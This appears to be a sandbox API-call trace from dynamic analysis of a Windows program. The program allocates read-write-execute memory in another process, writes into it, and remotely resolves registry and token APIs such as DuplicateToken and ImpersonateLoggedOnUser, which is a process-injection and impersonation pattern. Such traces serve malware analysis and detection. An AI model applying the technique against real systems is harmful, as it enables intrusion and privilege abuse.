	[0188.022] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.022] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb773e*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb773e*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0188.023] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.023] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.023] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.023] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.024] ResetEvent (hEvent=0x478) returned 1
	[0188.024] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.024] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.024] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.024] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.024] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055038, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.025] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.025] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.025] lstrlenA (lpString="RegSetValueExA") returned 14
	[0188.025] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.025] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb774e*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb774e*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.025] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.025] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.026] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.026] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.026] ResetEvent (hEvent=0x478) returned 1
	[0188.026] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.026] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.026] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.027] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.027] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.027] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005503c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.027] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.027] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.027] lstrlenA (lpString="RegCreateKeyExA") returned 15
	[0188.027] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.028] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7760*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7760*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0188.028] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.028] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.028] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.028] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.029] ResetEvent (hEvent=0x478) returned 1
	[0188.029] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.029] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.029] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.029] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.029] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.029] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055040, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.030] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.030] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.030] lstrlenA (lpString="RegQueryValueExA") returned 16
	[0188.030] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.030] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7772*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7772*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0188.030] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.030] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.031] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.031] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.031] ResetEvent (hEvent=0x478) returned 1
	[0188.031] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.031] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.031] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.032] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.032] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.032] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055044, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.032] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.032] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.032] lstrlenA (lpString="RegCloseKey") returned 11
	[0188.032] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.032] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7786*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7786*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0188.033] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.033] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.033] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.033] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.033] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.034] ResetEvent (hEvent=0x478) returned 1
	[0188.034] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.034] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.034] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.034] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.034] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.034] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055048, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.034] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.035] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.035] lstrlenA (lpString="GetTokenInformation") returned 19
	[0188.035] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.035] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7794*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7794*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0188.035] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.035] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.035] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.036] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.036] ResetEvent (hEvent=0x478) returned 1
	[0188.036] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.036] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.036] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.036] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.036] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.036] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005504c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.037] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.037] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.037] lstrlenA (lpString="ConvertSidToStringSidW") returned 22
	[0188.037] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.037] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb77aa*, nSize=0x17, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb77aa*, lpNumberOfBytesWritten=0x12857c*=0x17) returned 1
	[0188.038] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.038] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.038] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.038] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.038] ResetEvent (hEvent=0x478) returned 1
	[0188.038] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.039] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.039] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.039] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.039] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.039] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055050, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.040] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.040] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.040] lstrlenA (lpString="DuplicateToken") returned 14
	[0188.040] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.040] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb77c4*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb77c4*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.040] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.040] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.040] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.041] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.041] ResetEvent (hEvent=0x478) returned 1
	[0188.041] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.041] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.041] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.041] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.041] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.042] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055054, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.042] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.042] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.042] lstrlenA (lpString="OpenProcessToken") returned 16
	[0188.042] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.042] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb77d6*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb77d6*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0188.043] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.043] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.043] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.043] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.044] ResetEvent (hEvent=0x478) returned 1
	[0188.044] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.044] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.044] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.044] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.044] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.044] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055058, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.045] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.045] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.045] lstrlenA (lpString="ImpersonateLoggedOnUser") returned 23
	[0188.045] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.045] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb77ea*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb77ea*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.045] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.045] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.046] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.046] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.046] ResetEvent (hEvent=0x478) returned 1
	[0188.046] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.046] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.047] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.047] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.047] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.047] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005505c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.047] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.047] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.047] lstrlenA (lpString="GetUserNameA") returned 12
	[0188.047] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.048] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7804*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7804*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0188.048] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.048] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.048] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.049] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
